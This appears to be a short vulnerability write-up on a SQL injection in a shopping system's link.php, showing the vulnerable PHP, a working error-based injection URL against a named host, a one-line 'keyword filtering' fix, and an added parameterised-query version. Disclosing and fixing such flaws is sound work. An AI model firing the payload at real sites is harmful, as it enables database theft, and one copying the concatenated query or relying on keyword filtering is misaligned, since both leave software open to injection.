Originally, I wrote about the easy-to-use shopping SQL injection vulnerability today. I'd like to find some request variables. If you find that the link page also seems to have a loose filtering error, open the code and check out the problem. The code on the link.php page is as follows:
    if ($_REQUEST['act'] == 'go') // link label go
    {
        $url = ($_REQUEST['url']); // The url value is taken directly into the SQL query statement
        $link_item = $GLOBALS['db']->getRowCached("select * from " . DB_PREFIX . "link where (url = '" . $url . "' or url = 'http://" . $url . "') and is_effect = 1");
        if ($link_item) {
            // Count the click, limited per client IP
            if (check_ipop_limit(get_client_ip(), "Link", 10, $link_item['id']))
                $GLOBALS['db']->query("update " . DB_PREFIX . "link set count = count + 1 where id = " . $link_item['id']);
            $url = "http://" . $url;
        } else {
            $url = APP_ROOT . "/";
        }
        app_redirect($url);
    }
Can you see it clearly? Try
www.2cto.com/exptest/easethink/link.php?act=go&city=sanming&url='and(select%201%20from(select%20count(*)%2cconcat(select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(68)%2cCHAR(98)%2cCHAR(104)%2cCHAR(67)%2cCHAR(77)%2cCHAR(99)%2cCHAR(77)%2cCHAR(81)%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2)x%20from%20information_schema.tables%20group%20by%20x))
Solution:
Keyword Filtering
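
An alternative to filtering keywords, shown as an added example (not the application's own code and not from the original article): the same lookup with the url value bound as a query parameter. It assumes PDO with the SQLite driver standing in for the application's database layer; the in-memory link table, its row, the sample inputs and the function name resolve_link are constructed for illustration.

```php
<?php
// Added example. Table, row and function name are constructed for illustration.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE link (id INTEGER PRIMARY KEY, url TEXT, is_effect INTEGER, count INTEGER DEFAULT 0)');
$db->exec("INSERT INTO link (url, is_effect) VALUES ('http://partner.example', 1)");

// Hypothetical replacement for the lookup in link.php: returns the redirect target.
// The per-IP click limit of the original is left out to keep the example short.
function resolve_link(PDO $db, $raw): string
{
    // $_REQUEST values can be arrays (url[]=...); only a plain string is usable here.
    if (!is_string($raw) || $raw === '') {
        return '/';
    }
    // The value travels as bound data, so quotes in it never reach the SQL parser.
    $stmt = $db->prepare(
        'SELECT id FROM link WHERE (url = :plain OR url = :prefixed) AND is_effect = 1'
    );
    $stmt->execute([':plain' => $raw, ':prefixed' => 'http://' . $raw]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return '/';               // unknown link: fallback, as in the original else branch
    }
    $upd = $db->prepare('UPDATE link SET count = count + 1 WHERE id = :id');
    $upd->execute([':id' => (int) $row['id']]);
    return 'http://' . $raw;      // only reached for a value that matched a stored row
}

// Constructed inputs: a stored link, and a value carrying a quote and SQL text.
foreach (['partner.example', "partner.example' or '1'='1"] as $input) {
    echo str_pad($input, 30), ' => ', resolve_link($db, $input), PHP_EOL;
}
```

Because the second input is compared as a literal string against the url column, it matches no row and falls through to the fallback instead of altering the query.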